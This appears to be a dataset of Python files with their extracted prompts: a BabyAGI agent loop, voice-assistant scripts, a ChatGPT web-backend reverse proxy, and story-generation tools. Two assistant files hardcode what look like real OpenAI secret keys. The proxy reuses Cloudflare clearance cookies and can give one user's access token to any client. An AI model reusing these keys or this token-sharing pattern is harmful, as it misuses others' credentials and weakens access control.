typer.echo(f"Summary: {summary}")
if __name__ == "__main__":
app()
| [
"\n Here is the previous summary along with the new information is provided below.\n \n Here is the summary: PLACEHOLDER\n \n Here is the new information: PLACEHOLDER\n\n Please output a new condensed summary and nothing else.\n ",
"\n You are an AI summarizer. You have one goal: to condense a summary of a news article with new information from the article.\n\n Guidelines\n - Make every word count: Rewrite the previous summary to improve flow and make space for additional entities\n - Ensure key details are not lost: The new summary should contain all the entities from the previous summary\n - Never drop entities from the previous summary. If space cannot be made, add fewer new entities.\n - The new summary should be highly dense and concise yet self-contained, eg., easily understood without the Article.\n - Make space with fusion, compression, and removal of uninformative phrases like \"the article discusses\"\n - Missing entities can appear anywhere in the new summary\n - Keep the summary at a maximum of 4-5 sentences long\n\n An Entity is a real-world object that's assigned a name - for example, a person, country a product or a book title.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~9_babyagi.py | import asyncio
import json
import math
import os
from collections import deque
from itertools import islice
from typing import AsyncIterable, Iterable, Optional
import networkx as nx
import nltk
import numpy as np
import numpy.typing as npt
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from graphviz import Digraph
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel, Field
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, execute, format_prompt
np.random.seed(1)
nltk.download("punkt")
client = openai.AsyncOpenAI()
app = AsyncTyper()
func = wrap_chatcompletion(client.chat.completions.create)
class VectorDatabase(BaseModel):
text: list[str]
embeddings: npt.NDArray[np.float32]
class Config:
arbitrary_types_allowed = True
def save_to_file(self, filename: str):
# Convert NumPy array to a list for JSON serialization
data = {"text": self.text, "embeddings": self.embeddings.tolist()}
with open(filename, "w") as file:
json.dump(data, file)
@classmethod
def load_from_file(cls, filename: str):
with open(filename, "r") as file:
data = json.load(file)
# Convert list back to NumPy array
data["embeddings"] = np.array(data["embeddings"], dtype=np.float32)
return cls(**data)
async def add_text(self, text: str) -> None:
embeddings_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=text,
)
embedding: npt.NDArray[np.float32] = np.expand_dims(
np.array(embeddings_response.data[0].embedding), axis=0
)
self.text.append(text)
self.embeddings = np.concatenate([self.embeddings, embedding], axis=0)
async def top_k(self, query: str, k: int = 10) -> list[str]:
query_embedding_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=query,
)
query_embedding: npt.NDArray[np.float32] = np.array(
query_embedding_response.data[0].embedding
)
# cosine similarity
similarity: npt.NDArray[np.float32] = np.dot(query_embedding, self.embeddings.T) / (
np.linalg.norm(query_embedding) * np.linalg.norm(self.embeddings, axis=1)
)
sorted_similarity_indices: npt.NDArray[np.int64] = np.argsort(similarity)[::-1]
top_k: list[str] = [self.text[i] for i in sorted_similarity_indices[:k]]
return top_k
class TaskNames(BaseModel):
names: list[str]
class Task(BaseModel):
task_id: int = Field(..., description="The unique identifier for the task.")
task_name: str = Field(..., description="The name of the task.")
class TaskResult(BaseModel):
task_name: str = Field(..., description="The name of the task.")
task_result: str = Field(..., description="The result of the task.")
class SingleTaskListStorage:
def __init__(self):
self.tasks: deque[Task] = deque([])
self.task_id_counter = 0
def append(self, task: Task):
self.tasks.append(task)
def replace(self, tasks: list[Task]):
self.tasks = deque(tasks)
def popleft(self) -> Task:
return self.tasks.popleft()
def is_empty(self):
return False if self.tasks else True
def next_task_id(self) -> int:
self.task_id_counter += 1
return self.task_id_counter
def get_task_names(self):
return [t.task_name for t in self.tasks]
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def execution_agent(vecdb: VectorDatabase, objective: str, task: Task, k: int = 5) -> TaskResult:
related_entries = await vecdb.top_k(task.task_name, k=k)
result = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.
You will perform one task based on the objective: {objective}.
Take into account previous relevant tasks you have performed: {related_entries}.
"""
),
},
{
"role": "user",
"content": format_prompt(
f"""
Please output your response to the following task: {task.task_name}
Be as direct as possible and do not provide any other information.
"""
),
},
],
model="gpt-4",
temperature=0,
seed=256,
max_tokens=128,
)
assert len(result.choices) > 0, "No choices were provided."
content = result.choices[0].message.content
assert content is not None, "No content was provided."
return TaskResult(task_name=task.task_name, task_result=content)
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def task_creation_agent(objective: str, task_result: TaskResult, task_list: SingleTaskListStorage, max_new_tasks: int = 3) -> TaskNames:
result: Optional[TaskNames] = None
for _ in range(3):
try:
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.
You are to use the result from an execution agent to create new tasks with the following objective: {objective}.
The last completed task has the result: {task_result.model_dump_json()}
This result was based on this task description: {task_result.task_name}.
"""
),
},
]
if not task_list.is_empty():
messages.append({
"role": "system",
"content": format_prompt(
f"""
You have the following incomplete tasks in your task list: {task_list.get_task_names()}
"""
),
})
messages.append({
"role": "user",
"content": format_prompt(
f"""
Add a list of tasks to your task list. Each task should be on a new line and not conflict with the objective or other tasks.
If no tasks need to be added, just output an empty list.
"""
),
})
result = await asyncio.wait_for(
func(
messages=messages,
model="gpt-3.5-turbo-0613",
response_model=TaskNames,
temperature=0.1,
seed=256,
),
timeout=30,
)
break
except asyncio.TimeoutError:
continue
if result is None:
raise RuntimeError("Failed to classify article after 3 attempts")
return result
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def task_priority_agent(objective: str, task_list: SingleTaskListStorage) -> TaskNames:
result: Optional[TaskNames] = None
tasks_prompt = "\n".join(task_list.get_task_names())
for _ in range(3):
try:
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.
You are tasked with prioritizing the following tasks:
{tasks_prompt}
Consider the ultimate objective of your team: {objective}.
Tasks should be sorted from highest to lowest priority, where higher-priority tasks are those that act as pre-requisites or are more essential for meeting the objective.
Do not remove any tasks. Return the ranked tasks in the order of priority:
"""
),
},
]
result = await asyncio.wait_for(
func(
messages=messages,
model="gpt-3.5-turbo-0613",
response_model=TaskNames,
temperature=0.1,
seed=256,
),
timeout=30,
)
break
except asyncio.TimeoutError:
continue
if result is None:
raise RuntimeError("Failed to classify article after 3 attempts")
return result
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def best_breakfast_result(objective: str, task_results: list[TaskResult]) -> AsyncIterable[str]:
tasks_prompt = "\n".join(map(lambda t: t.model_dump_json(), task_results))
result = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.
You have just executed a series of tasks in pursuit of an objective: {objective}.
Here are your task results:
{tasks_prompt}
"""
),
},
{
"role": "user",
"content": format_prompt(
f"""
Based on the task results, answer the objective: {objective}.
Output a single distinctive answer that is as short as possible.
"""
),
}
],
max_tokens=64,
temperature=0.9,
model="gpt-4",
stream=True,
)
async for message in result:
assert len(message.choices) > 0, "No translation was provided."
content = message.choices[0].delta.content
if content is not None:
yield content
async def read_or_create_vecdb(vecdb_filename) -> VectorDatabase:
if os.path.exists(vecdb_filename):
vecdb = VectorDatabase.load_from_file(vecdb_filename)
else:
vecdb = VectorDatabase(text=[], embeddings=np.empty((0, 1536), dtype=np.float32))
vecdb.save_to_file(vecdb_filename)
return vecdb
@app.command()
async def vec_lookup(n: int = 8):
## Load vecdb
vecdb_filename = "./data/vecdb.json"
vecdb = await read_or_create_vecdb(vecdb_filename)
## Collect user input task
objective: str = str(typer.prompt(f"BabyAGI objective", type=str))
assert len(objective) > 0, "Please provide some text."
task: str = str(typer.prompt(f"BabyAGI task", type=str))
assert len(task) > 0, "Please provide some text."
## Add first task to the task list
tasks = SingleTaskListStorage()
initial_task = Task(task_id=tasks.next_task_id(), task_name=task)
tasks.append(initial_task)
## history
history: list[TaskResult] = []
## Run babyagi for n stepstoken
for step in range(n):
if tasks.is_empty():
typer.echo(f"Done!")
else:
typer.echo("\n")
typer.echo(f"*** Step {step} ***")
## Log the task list and current task
typer.echo(f"Task list:")
for name in tasks.get_task_names():
typer.echo(f" - {name}")
current_task = tasks.popleft()
typer.echo(f"Current task: {current_task.task_name}")
## Execute the current task
current_task_result = await execution_agent(vecdb, objective, current_task)
await vecdb.add_text(current_task_result.model_dump_json())
history.append(current_task_result)
typer.echo(f"Current tasks result: {current_task_result.task_result}")
## Create new tasks
new_task_names = await task_creation_agent(
objective, current_task_result, tasks
)
for new_task_name in new_task_names.names:
tasks.append(Task(task_id=tasks.next_task_id(), task_name=new_task_name))
## Prioritize tasks
new_task_names = await task_priority_agent(objective, tasks)
tasks = SingleTaskListStorage()
for new_task_name in new_task_names.names:
tasks.append(Task(task_id=tasks.next_task_id(), task_name=new_task_name))
typer.echo(f"History:")
max_str_len = 50
for task_result in history:
if len(task_result.task_result) > max_str_len:
typer.echo(f" - {task_result.task_name}: {task_result.task_result[:max_str_len]}...")
else:
typer.echo(f" - {task_result.task_name}: {task_result.task_result}")
typer.echo("\n")
typer.echo("\n")
typer.echo("\n")
typer.echo(f"Objective result:")
async for token in best_breakfast_result(objective, history):
typer.echo(token, nl=False)
if __name__ == "__main__":
app()
| [
"\n",
"\n You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.\n \n You have just executed a series of tasks in pursuit of an objective: PLACEHOLDER.\n \n Here are your task results:\n PLACEHOLDER\n ",
"\n Add a list of tasks to your task list. Each task should be on a new line and not conflict with the objective or other tasks.\n \n If no tasks need to be added, just output an empty list.\n ",
"\n You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.\n \n You will perform one task based on the objective: PLACEHOLDER.\n \n Take into account previous relevant tasks you have performed: PLACEHOLDER.\n ",
"\n Based on the task results, answer the objective: PLACEHOLDER.\n \n Output a single distinctive answer that is as short as possible.\n ",
"\n You are a baby artificial general intelligence (AGI) system. You role is to execute tasks in pursuit of a goal.\n \n You are tasked with prioritizing the following tasks:\n PLACEHOLDER\n\n Consider the ultimate objective of your team: PLACEHOLDER.\n \n Tasks should be sorted from highest to lowest priority, where higher-priority tasks are those that act as pre-requisites or are more essential for meeting the objective.\n Do not remove any tasks. Return the ranked tasks in the order of priority:\n "
] |
2024-01-10 | Praneesh-Sharma/Virtual_Assistant | model_v1.4.py | import requests
from bs4 import BeautifulSoup
import pyttsx3
import speech_recognition as sr
import datetime
import openai
# openai.api_key = "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"
def speak(data):
engine = pyttsx3.init()
engine.setProperty('rate', 150)
engine.setProperty('volume', 1)
engine.say(data)
engine.runAndWait()
# def get_audio():
# r = sr.Recognizer()
# with sr.Microphone() as source:
# print("Speak:")
# r.adjust_for_ambient_noise(source)
# audio = r.listen(source)
# # said = ""
# said = r.recognize_google(audio)
#
# try:
# print("You said: \n" + said)
# except sr.UnknownValueError:
# print("Sorry, could not understand your speech.")
# except sr.RequestError as e:
# print("Request error; {0}".format(e))
#
# return said.lower()
def get_audio():
engine = pyttsx3.init()
r = sr.Recognizer()
with sr.Microphone() as source:
print("Speak:")
# r.adjust_for_ambient_noise(source)
audio = r.listen(source)
voice_command = r.recognize_google(audio)
try:
print(f"User said: {voice_command}")
except sr.UnknownValueError:
print("Sorry, I did not understand that.")
engine.say("Sorry, I did not understand that.")
engine.runAndWait()
exit()
except sr.RequestError:
print("Sorry, I could not process your request.")
engine.say("Sorry, I could not process your request.")
engine.runAndWait()
return voice_command.lower()
# def query(user_query):
# url = "https://www.google.co.in/search?q=" + user_query
# headers = {
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
# '(KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
# }
# page = requests.get(url, headers=headers)
# soup = BeautifulSoup(page.content, 'html.parser')
# results = soup.find(class_='Z0LcW t2b5Cf').get_text()
# print(results)
# return results
def chatgpt(user_query):
response = openai.Completion.create(engine='text-davinci-003',
prompt=user_query,
n=1,
temperature=0.5,
max_tokens=50,
top_p=1)
return response['choices'][0]['text']
WAKE = "hello"
speak("Active")
while True:
flag = 0
print("Active")
# speak("Active")
texts = get_audio()
if texts.count(WAKE) > 0:
print("I am listening")
speak("I am listening")
try:
text = get_audio()
# result = query(text)
# on = ["turn on the lights", "switch on the lights", "lights on"]
# for phrase in on:
if 'switch on' in text:
flag = 1
speak("Turning on the lights")
# do something
# off = ["Turn off the lights", "Switch off the lights", "Lights off"]
# for phrase in off:
if 'switch off' in text:
flag = 1
speak("Turning off the lights")
# do something
# time = ["What is the time"]
# for phrase in time:
if 'time now' in text:
flag = 1
now = datetime.datetime.now()
time_string = now.strftime("The time is %I:%M %p.")
speak(time_string)
print(time_string)
# date = ["What is the date"]
# for phrase in time:
if 'date today' in text:
flag = 1
now = datetime.datetime.now()
date_string = now.strftime("Today's date is %B %d, %Y.")
speak(date_string)
print(date_string)
if 'weather' in text:
api_url = 'https://api.api-ninjas.com/v1/weather?city={}'.format(text)
response = requests.get(api_url, headers={'X-Api-Key': 'YOUR_API_KEY'})
if response.status_code == requests.codes.ok:
print(response.text)
if flag != 1:
result = chatgpt(text)
print(result)
speak(result)
except sr.UnknownValueError:
# print('Sorry no result')
speak('Sorry no result')
if 'terminate' in texts:
speak("Terminating")
print("Terminating")
exit()
| [] |
2024-01-10 | Praneesh-Sharma/Virtual_Assistant | model_v1.3.py | import requests
from bs4 import BeautifulSoup
import pyttsx3
import speech_recognition as sr
import datetime
# import openai
# openai.api_key = "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"
def speak(data):
engine = pyttsx3.init()
engine.say(data)
engine.runAndWait()
# def get_audio():
# r = sr.Recognizer()
# with sr.Microphone() as source:
# print("Speak:")
# r.adjust_for_ambient_noise(source)
# audio = r.listen(source)
# # said = ""
# said = r.recognize_google(audio)
#
# try:
# print("You said: \n" + said)
# except sr.UnknownValueError:
# print("Sorry, could not understand your speech.")
# except sr.RequestError as e:
# print("Request error; {0}".format(e))
#
# return said.lower()
def get_audio():
engine = pyttsx3.init()
r = sr.Recognizer()
with sr.Microphone() as source:
print("Speak:")
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
voice_command = r.recognize_google(audio)
try:
print(f"User said: {voice_command}")
except sr.UnknownValueError:
print("Sorry, I did not understand that.")
engine.say("Sorry, I did not understand that.")
engine.runAndWait()
exit()
except sr.RequestError:
print("Sorry, I could not process your request.")
engine.say("Sorry, I could not process your request.")
engine.runAndWait()
return voice_command
def query(user_query):
url = "https://www.google.co.in/search?q=" + user_query
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
}
page = requests.get(url, headers=headers)
soup = BeautifulSoup(page.content, 'html.parser')
results = soup.find(class_='Z0LcW t2b5Cf').get_text()
print(results)
return results
# def chatgpt(user_query):
# response = openai.Completion.create(engine='text-davinci-003',
# prompt=user_query,
# n=1,
# temperature=0.5,
# max_tokens=50,
# top_p=1)
# return response['choices'][0]['text']
WAKE = "hello"
speak("AActive")
while True:
flag = 0
print("Active")
# speak("Active")
texts = get_audio()
if texts.count(WAKE) > 0:
print("I am listening")
speak("I am listening")
try:
text = get_audio()
# result = query(text)
# on = ["turn on the lights", "switch on the lights", "lights on"]
# for phrase in on:
if 'switch on' in text:
flag = 1
speak("Turning on the lights")
# do something
# off = ["Turn off the lights", "Switch off the lights", "Lights off"]
# for phrase in off:
if 'switch off' in text:
flag = 1
speak("Turning off the lights")
# do something
# time = ["What is the time"]
# for phrase in time:
if 'time now' in text:
flag = 1
now = datetime.datetime.now()
time_string = now.strftime("The time is %I:%M %p.")
speak(time_string)
print(time_string)
# date = ["What is the date"]
# for phrase in time:
if 'date today' in text:
flag = 1
now = datetime.datetime.now()
date_string = now.strftime("Today's date is %B %d, %Y.")
speak(date_string)
print(date_string)
# if flag != 1:
# result = chatgpt(text)
# print(result)
# speak(result)
except sr.UnknownValueError:
# print('Sorry no result')
speak('Sorry no result')
| [] |
2024-01-10 | Praneesh-Sharma/Virtual_Assistant | test3.py | import openai
openai.api_key = "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"
def chatgpt(user_query):
response = openai.Completion.create(engine='text-ada-001',
prompt=user_query,
n=1,
temperature=0.5)
return response.choices[0].text
prompt = "Hello, how are you?"
print(chatgpt(prompt))
| [
"Hello, how are you?"
] |
2024-01-10 | 18870/chatgpt-proxy | chatgpt_proxy~proxy.py | import asyncio
import logging
from typing import Optional
from urllib.parse import urlparse, urlunparse, ParseResult
import httpx
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import StreamingResponse
logger = logging.getLogger(__name__)
class ReverseProxy:
ALL_METHODS = [
"GET",
"POST",
"HEAD",
"PUT",
"DELETE",
"OPTIONS",
"PATCH",
"TRACE",
"CONNECT",
]
def __init__(self, base_url: str) -> None:
self.base_url = base_url
self.client = httpx.AsyncClient(base_url=base_url)
_url = urlparse(base_url)
self._domain = _url.netloc
self._origin = urlunparse(
ParseResult(
scheme=_url.scheme,
netloc=_url.netloc,
path="",
params="",
query="",
fragment="",
)
)
self._preset_headers = {
"host": self._domain,
"origin": self._origin,
"referer": self.base_url,
}
async def _prepare_cookies(self, request: Request):
return request.cookies.copy()
async def _prepare_headers(self, request: Request):
# Note that all header keys are lowercased
headers = dict(request.headers)
# cookie in headers have higher priority
# so remove it here and let cookies parameter take effect
headers.pop("cookie", None)
# preset header
headers.update(self._preset_headers)
return headers
async def _process_response(self, response: httpx.Response):
pass
async def proxy(self, request: Request, path: str):
# https://github.com/tiangolo/fastapi/discussions/7382#discussioncomment-5136454
logger.info(f"Proxying {request.method} {request.url}")
rp_resp = await self._send_request(
path=path,
query=request.url.query.encode("utf-8"),
method=request.method,
headers=await self._prepare_headers(request),
cookies=await self._prepare_cookies(request),
content=request.stream(),
)
await self._process_response(rp_resp)
# Handle Set-Cookie headers
headers = rp_resp.headers.copy()
headers.pop("set-cookie", None)
resp = StreamingResponse(
rp_resp.aiter_raw(),
status_code=rp_resp.status_code,
headers=headers,
)
for key, value in rp_resp.cookies.items():
resp.set_cookie(key=key, value=value)
return resp
async def _send_request(self, path: str, query: bytes, **kwargs) -> httpx.Response:
url = httpx.URL(path=path, query=query)
rp_req = self.client.build_request(url=url, **kwargs)
rp_resp = await self.client.send(rp_req, stream=True)
return rp_resp
def attach(self, app: FastAPI, path: str, **kwargs) -> None:
path = path.rstrip("/")
app.add_api_route(
path + "/{path:path}",
self.proxy,
methods=self.ALL_METHODS,
description=f"Reverse proxy of {self.base_url}",
**kwargs,
)
class WebChatGPTProxy(ReverseProxy):
def __init__(
self,
cf_clearance: str,
user_agent: str,
puid: str,
access_token: Optional[str] = None,
trust: bool = False,
) -> None:
"""
:param cf_clearance: from `cf_clearance` cookie
:param user_agent: from `user-agent` header
:param access_token: from openai `access_token`
obtained from here https://chat.openai.com/api/auth/session
Used to refresh puid
:param puid: from `_puid` cookie
:param trust: Trust requests from any client.
When set to True, any requests without an access_token will be given the above access_token.
Default to False, which will only use for refresh puid.
"""
super().__init__(base_url="https://chat.openai.com/backend-api/")
self.cf_clearance = cf_clearance
self.user_agent = user_agent
self.access_token = access_token
self.puid = puid
self.trust = trust
self._app: Optional[FastAPI] = None
self._path: Optional[str] = None
self.valid_state = False
async def _prepare_cookies(self, request: Request):
cookies = await super()._prepare_cookies(request)
if self.cf_clearance is not None:
cookies.setdefault("cf_clearance", self.cf_clearance)
if self.puid is not None:
cookies.setdefault("_puid", self.puid)
return cookies
async def _prepare_headers(self, request: Request):
headers = await super()._prepare_headers(request)
headers["referer"] = "https://chat.openai.com"
headers["user-agent"] = self.user_agent
if self.trust and self.access_token:
headers.setdefault("authorization", f"Bearer {self.access_token}")
return headers
async def _process_response(self, response: httpx.Response):
if response.status_code == 200:
self.valid_state = True
elif response.status_code == 403:
logger.error("403 Forbidden found")
self.valid_state = False
async def _refresh_puid(self) -> bool:
"""
Send requests to /models through reverse proxy (current FastAPI app) to get a new puid
Deprecated
"""
if self._app is None:
logger.info("Not attached to any FastAPI app, skip")
async with httpx.AsyncClient(
app=self._app, base_url=f"https://chat.openai.com{self._path}"
) as client:
resp = await client.get(
"/models", headers={"authorization": f"Bearer {self.access_token}"}
)
puid = resp.cookies.get("_puid")
if puid:
logger.info(f"puid: {puid[:15]}...{puid[30:40]}...")
self.puid = puid
return True
else:
logger.error("Failed to get puid")
logger.error(f"Cookies: {resp.cookies}")
logger.error(f"Response: \n{resp.text}")
return False
async def _refresh_task(self) -> None:
if self.access_token is None:
logger.info("access_token not found, skip")
return
while True:
try:
await self.check_cf()
except Exception as e:
logger.exception(e)
await asyncio.sleep(60 * 60)
continue
await asyncio.sleep(60 * 60 * 6)
async def check_cf(self) -> bool:
if self._app is None:
logger.info("Not attached to any FastAPI app, cannot perform check")
async with httpx.AsyncClient(
app=self._app, base_url=f"https://chat.openai.com{self._path}"
) as client:
resp = await client.get(
"/models", headers={"authorization": f"Bearer {self.access_token}"}
)
if resp.status_code in (200, 401):
logger.info(f"Check passed, status code: {resp.status_code}")
puid = resp.cookies.get("_puid")
if puid:
logger.info(f"puid: {puid[:15]}...{puid[30:40]}...")
self.puid = puid
self.valid_state = True
return True
elif resp.status_code == 403:
logger.error(f"Check failed, status code 403")
logger.error(f"Response: \n{resp.text}")
return False
def attach(self, app: FastAPI, path: str) -> None:
super().attach(app=app, path=path, include_in_schema=self.trust)
self._app = app
self._path = path
| [] |
2024-01-10 | realsuperheavy/Creative-Writers-Toolkit | 1Create%20some%20characters.py | # -*- coding: utf-8 -*-
"""
Created on Thu May 26 09:00:55 2022
@author: user
"""
import os
import openai
from time import time,sleep
import re
import tkinter as tk
from tkinter import filedialog
from tkinter import *
from tkinter.filedialog import askopenfilename
def open_file(filepath):
with open(filepath, 'r', encoding='utf-8') as infile:
return infile.read()
openai.api_key = open_file('openaiapikey.txt')
def save_file(content, filepath):
with open(filepath, 'w', encoding='utf-8') as outfile:
outfile.write(content)
def isFileExists(filename):
return os.path.isfile(filename)
def gpt3_completion(prompt, engine='text-davinci-002', temp=1.0, top_p=1.0, tokens=1000, freq_pen=0.5, pres_pen=0.0, stop=['asdfasdf']):
max_retry = 5
retry = 0
while True:
try:
response = openai.Completion.create(
engine=engine, # use this for standard models
#model=engine, # use this for finetuned model
prompt=prompt,
temperature=temp,
max_tokens=tokens,
top_p=top_p,
frequency_penalty=freq_pen,
presence_penalty=pres_pen,
stop=stop)
text = response['choices'][0]['text'].strip()
#text = re.sub('\s+', ' ', text)
#save_gpt3_log(prompt, text)
return text
except Exception as oops:
retry += 1
if retry >= max_retry:
return None
print('Error communicating with OpenAI:', oops)
sleep(1)
def find_number(s):
for i in range(len(s)):
if s[i].isdigit():
return s[i:]
return None
def remove_linebreaks(s):
return re.sub(r'[\r\n]+', '', s)
def remove_nonprintable(s):
return re.sub(r'[^\x00-\x7F]+','', s)
def remove_spaces(s):
#remove_chars = '< > : " / \ | ? *.!@#$%^&*(){}[].,-?`;:'
#s = s.translate({ ord(c): None for c in remove_chars })
#return s
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
if __name__ == '__main__':
print("This code creates characters for your stories")
print("You can start from scratch, or use other text files (such as story synopses, series information, or other characters)")
print("to spark the ideas")
print("You can create multiple characters at a time")
print("This code will create two files per character: a detailed character breakdown, and a precis")
#ask for genre
storytype=input("Genre or type of story your character will appear in (leave blank if you like):")
#ask for supporting files
print("For supporting files, you can bring in a synopsis, and brainstorm a main, or supporting character")
print("or you can import another character and brainstorm their husband, or enemy, etc. ")
print("alternatively you could create a text file describing an alien race, and brainstorm a member of that species")
print("in fact any text file will do - keep it short though. Less is more")
supporting=input("Load supporting files(y/n)?")
supportingfiles=""
if supporting=="y":
while True:
ftext=""
root = Tk()
root.filename = askopenfilename(initialdir = "/",title = "Select supporting file",filetypes = (("text files","*.txt"),("all files","*.*")))
#print (root.filename)
scenename=os.path.basename(root.filename)
folderpath=os. path. dirname(root.filename)
print(folderpath)
ftext=""
with open(root.filename, "r") as f:
ftext = f.read()
root.destroy()
#load file
supportingfiles=supportingfiles+ftext+"\n"
an=input("Load Another(y/n)?")
if an=="n":
break
#ask for tweaks
print("Now you can add any additional info. This can be a short description")
print("eg. 'a character you'd find in a murder mystery'")
print("or 'the antagonist in the above story (if you've loaded in a supporting synopsis)")
print("or 'someone with a grudge against the character above' - again, any note will work!")
tweak=""
tweak=input("Additional character information?")
if tweak !="":
tweak="Make the character "+tweak
#ask for folder
nul=input("choose a folder to save the characters (hit return to continue)")
root = Tk()
root.attributes("-topmost", True)
folder_location = tk.filedialog.askdirectory()
root.destroy()
print ("Folder chosen: "+folder_location)
#ask how many characters
chars=1
ch=input("How many characters shall we brainstorm?")
chars=int(ch)
#load in prompt and assemble
folder = "planprompts/"
filename = "prompt01.txt"
filepath = os.path.join(folder, filename)
with open(filepath, "r") as f:
prompt = f.read()
prompt = prompt.replace('<<STORYTYPE>>', storytype).replace('<<SUPPORTINGFILES>>', supportingfiles).replace('<<TWEAK>>', tweak)
#call gpt3
for char in range (1,chars+1):
print("Querying GPT3..........................................")
completion1 = gpt3_completion(prompt)
#get character name
completion1="1)"+completion1
completion1 = completion1.replace(r'\n', '\n\n')
name="000"
name = completion1[completion1.find("Name:")+len("Name:"):completion1.find("2)")]
name = remove_linebreaks(name)
name = remove_nonprintable(name)
name = remove_spaces(name)
if name == None:
name=""
name=name+str(char)+".txt"
print("character name:"+name)
print(completion1)
#create precis
print("Querying GPT3..........................................")
completion2 = gpt3_completion("Create a brief, 1 pargagraph summary of the following character"+"\n"+ completion1+"\n"+name+"\nSUMMARY:")
print (completion2)
#save files
filepath = os.path.join(folder_location, name)
with open(filepath,"w",encoding="utf-8") as f:
f.write(completion1)
filepath = os.path.join(folder_location, "Precis_"+name)
with open(filepath,"w",encoding="utf-8") as f:
f.write(completion2)
#find character name and save detailed character
#call gpt3 again to create precis and save
| [
"<<STORYTYPE>>",
"<<SUPPORTINGFILES>>"
] |
2024-01-10 | realsuperheavy/Creative-Writers-Toolkit | 2Create%20some%20synopses.py | # -*- coding: utf-8 -*-
"""
Created on Thu May 26 09:00:55 2022
@author: user
"""
import os
import openai
from time import time,sleep
import re
import tkinter as tk
from tkinter import filedialog
from tkinter import *
from tkinter.filedialog import askopenfilename
def open_file(filepath):
with open(filepath, 'r', encoding='utf-8') as infile:
return infile.read()
openai.api_key = open_file('openaiapikey.txt')
def save_file(content, filepath):
with open(filepath, 'w', encoding='utf-8') as outfile:
outfile.write(content)
def isFileExists(filename):
return os.path.isfile(filename)
def gpt3_completion(prompt, engine='text-davinci-002', temp=1.0, top_p=1.0, tokens=1000, freq_pen=0.5, pres_pen=0.0, stop=['asdfasdf']):
max_retry = 5
retry = 0
while True:
try:
response = openai.Completion.create(
engine=engine, # use this for standard models
#model=engine, # use this for finetuned model
prompt=prompt,
temperature=temp,
max_tokens=tokens,
top_p=top_p,
frequency_penalty=freq_pen,
presence_penalty=pres_pen,
stop=stop)
text = response['choices'][0]['text'].strip()
text = re.sub('\s+', ' ', text)
#save_gpt3_log(prompt, text)
return text
except Exception as oops:
retry += 1
if retry >= max_retry:
return None
print('Error communicating with OpenAI:', oops)
sleep(1)
def find_number(s):
for i in range(len(s)):
if s[i].isdigit():
return s[i:]
return None
def remove_linebreaks(s):
return re.sub(r'[\r\n]+', '', s)
def remove_nonprintable(s):
return re.sub(r'[^\x00-\x7F]+','', s)
def remove_spaces(s):
return s.replace(' ', '')
def remove_speechmarks(s):
remove_chars = '< > : " / \ | ? *.!@#$%^&*(){}[].,-?`;:'
s = s.translate({ ord(c): None for c in remove_chars })
return s
if __name__ == '__main__':
print("This code creates synopses")
print("You can start from scratch, or use other text files (such as story backgrounds, series information, or characters)")
print("to spark the ideas")
print("You can create multiple stories at a time")
#print("This code will create two files per story: a detailed breakdown, and a short summary")
#ask for genre
storytype=input("Genre or type of story (leave blank if you like):")
#ask for supporting files
print("For supporting files, you can bring in characters who will appear in the story")
print("or you can import background info like desciptions of themes, or ideas you want to explore ")
print("alternatively you could create a text file giving the backstory, or details of the world of the story")
print("in fact any text file will do - keep it short though. Less is more")
supporting=input("Load supporting files(y/n)?")
supportingfiles=""
if supporting=="y":
while True:
ftext=""
root = Tk()
root.filename = askopenfilename(initialdir = "/",title = "Select supporting file",filetypes = (("text files","*.txt"),("all files","*.*")))
#print (root.filename)
scenename=os.path.basename(root.filename)
folderpath=os. path. dirname(root.filename)
print(folderpath)
ftext=""
with open(root.filename, "r") as f:
ftext = f.read()
root.destroy()
#load file
supportingfiles=supportingfiles+ftext+"\n"
an=input("Load Another(y/n)?")
if an=="n":
break
if supportingfiles=="":
supportingfiles=="Intelligent, original storyline with large amounts of colour and detail."
#ask for tweaks
print("Now you can add any additional info. This can be a short description")
print("eg. 'a kids story about robots'")
print("or 'A story in which the above character is the hero (if you've loaded in a protagonist character)")
print("or 'a story set in the world described above - again, any note will work!")
tweak=""
tweak=input("Additional Story information?")
if tweak !="":
tweak="Make the story "+tweak
#ask for folder
nul=input("choose a folder to save the storylines (hit return to continue)")
root = Tk()
root.attributes("-topmost", True)
folder_location = tk.filedialog.askdirectory()
root.destroy()
print ("Folder chosen: "+folder_location)
#ask how many characters
chars=1
ch=input("How many stories shall we brainstorm?")
chars=int(ch)
#ask for a title
title=input("Story Title:")
#load in prompt and assemble
folder = "planprompts/"
filename = "synopsisprompt.txt"
filepath = os.path.join(folder, filename)
with open(filepath, "r") as f:
prompt = f.read()
prompt = prompt.replace('<<STORYTYPE>>', storytype).replace('<<SUPPORTINGFILES>>', supportingfiles).replace('<<TWEAK>>', tweak)
#call gpt3
for char in range (1,chars+1):
